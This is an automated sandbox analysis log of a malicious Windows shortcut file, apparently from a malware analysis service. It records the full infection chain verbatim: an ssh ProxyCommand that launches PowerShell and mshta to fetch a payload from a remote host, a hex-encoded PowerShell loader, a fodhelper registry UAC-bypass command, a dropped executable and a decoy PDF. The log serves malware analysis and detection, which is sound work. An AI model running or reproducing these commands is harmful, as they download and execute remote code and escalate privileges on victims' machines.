          Malicious sample detected (through community Yara rule)
          Source: Process Memory Space: powershell.exe PID: 180, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Powershell drops PE file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mama.exeJump to dropped file
          Windows shortcut file (LNK) contains suspicious command line arguments
          Source: vreFmptfUu.lnkLNK file: -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 43_2_03435340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,43_2_03435340
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF7BFD40FB613_2_00007FF7BFD40FB6
          Source: mama.exe.13.drStatic PE information: Number of sections : 11 > 10
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 4181
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 4181Jump to behavior
          Source: Process Memory Space: powershell.exe PID: 180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.evad.winLNK@78/73@4/5
          Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8916:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_1834116504
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8708:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwav1ubt.rpx.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: mama.exe, 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: vreFmptfUu.lnkReversingLabs: Detection: 36%
          Source: vreFmptfUu.lnkVirustotal: Detection: 39%
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://pravo-bashkortostan.ru/aaa.mp4"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pravo-bashkortostan.ru/aaa.mp4Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exeJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nopJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1592,i,1127921047332727915,3798785087660649404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
